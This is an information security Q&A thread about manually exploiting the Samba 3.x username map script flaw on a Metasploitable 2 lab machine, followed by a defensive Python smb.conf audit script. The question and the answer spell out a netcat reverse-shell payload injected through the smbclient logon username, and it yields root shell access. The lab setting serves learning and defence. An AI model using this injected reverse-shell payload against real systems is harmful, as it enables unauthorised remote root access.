Information Security
Updated Sat, 16 Jul 2022 08:34:09 GMT

Reverse connection Metasploitable 2 -> Kali Linux (Samba 3.x) without Metasploit

I am trying to exploit Metasploitable 2 without the use of Metasploit, with the aim of learning. In this case, I am focusing on Samba 3.x (TCP ports 139 and 445).

In this link two different methods are explained to exploit this machine after an nmap scan reveals TCP ports 139, and 445 open, which are running Samba version 3.x.

The second method explains that

This vulnerability takes advantage of the username map script functionality of Samba. There is no filtering of user input, so an attacker could connect to an SMB session, and use shell metacharacters as input for the username, causing the commands to be executed on the remote system. This could allow the attacker to gain a remote shell to the victim machine with root access.

My problem comes when Metasploit is used, as it is used in:

I finally found this video that avoids Metasploit, but it doesn't work for me. It follows these steps (Kali=; Metasploitable2=

  1. In Terminal window 1, we set netcat to listen:

    netcat -nlvp 4444

  2. In Terminal window 2, we check the share

    smbclient -L //

  3. We focus on the tmp folder, and connect (Terminal 2):

    smbclient //

  4. Finally, we obtain the "smb: >" prompt, where the "logon" command is used to make a reverse connection to Kali, as:

    smb: > logon "/=nc 4444 -e /bin/bash"

This last point doesn't work for me; I get the following error message: "session setup failed: NT_STATUS_NO_MEMORY".

It is hard for me to find a good manual that explains the "logon" command. I tried changing the way netcat is used:

In point 1, I write:

    smb: \> nc -nlvp 4444 -e /bin/bash

In point 4, I write:

    smb: \> logon "/=`nc 4444 -e /bin/bash`"

Same result. Same error message.

I really tried to do it by myself, but couldn't. I would be very grateful if you could help me.

Thank you in advance!!


It looks like you are setting up your listener in smb (vulnerable box):

    smb: \> nc -nlvp 4444 -e /bin/bash

What you should be doing is setting up the listener on your attacking box, using the following command instead:

    nc -nlvp 4444

Finally, from your Metasploitable 2 box you issue the command:

    logon "/=`nc 'attack box ip' 4444 -e /bin/bash`"
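From the defender's side, the weakness the question describes hinges on a single smb.conf directive: `username map script`. The following audit script is an added example, not code from the thread or from the Samba project; it parses a constructed sample smb.conf, reports whether that directive is set in `[global]`, and shows that removing the line clears the finding (the sample file contents and script path are made up for illustration).

```python
import re

# Constructed sample smb.conf (not copied from any real host). The [global]
# block carries the 'username map script' directive that the vulnerable
# Samba code path described in the question depends on.
VULNERABLE_CONF = """\
# Samba configuration (constructed sample)
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   username map script = /etc/samba/scripts/mapusers.sh
   security = user

[tmp]
   path = /tmp
   writable = yes
"""

# Same file with the directive removed: the affected code path is never reached.
FIXED_CONF = VULNERABLE_CONF.replace(
    "   username map script = /etc/samba/scripts/mapusers.sh\n", "")


def parse_smb_conf(text):
    """Minimal smb.conf parser returning {section: {key: value}}.
    Parameter names are lower-cased with whitespace stripped so that spacing
    or capitalisation variants of the same directive still match."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()  # new section header
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections


def username_map_script(text):
    """Return the [global] 'username map script' value, or None when unset."""
    return parse_smb_conf(text).get("global", {}).get("usernamemapscript")


def audit(text):
    """List findings relevant to the Samba issue discussed in this thread."""
    script = username_map_script(text)
    if not script:
        return []
    return ["[global] 'username map script' is set (%s): on an unpatched Samba 3.x "
            "this enables the attack in the thread; remove it or upgrade Samba." % script]


if __name__ == "__main__":
    for label, conf in (("vulnerable", VULNERABLE_CONF), ("fixed", FIXED_CONF)):
        print(label, audit(conf) or ["no findings"])
```

Run it against a real `/etc/samba/smb.conf` by reading the file into `audit()`; `testparm` on the Samba host will also print the effective `[global]` settings if the file uses includes or continuation lines that this small parser does not handle.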